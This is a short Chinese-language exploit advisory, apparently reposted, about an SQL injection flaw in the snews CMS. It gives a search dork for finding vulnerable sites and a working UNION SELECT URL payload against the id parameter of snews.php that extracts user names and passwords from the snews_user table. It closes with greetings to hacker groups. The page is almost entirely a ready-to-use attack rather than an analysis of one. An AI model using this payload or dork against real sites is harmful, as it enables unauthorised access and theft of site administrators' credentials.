标题: CMS snews SQL Injection Vulnerability 作者: By onestree 下载地址 : http://snewscms.com/ 测试平台 : ubuntu 12.10 / win 7 关键词: inurl:"tanyakan pada rumput yang bergoyang" ************************************************************* SQL poc: http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL] 示例 http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* 致谢: Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell indonesiancoder - moeslimh4x0r - go-coder spesial my hunny :*
查看更多关于CMS snews SQL注射及修复 - 网站安全 - 自学php的详细内容...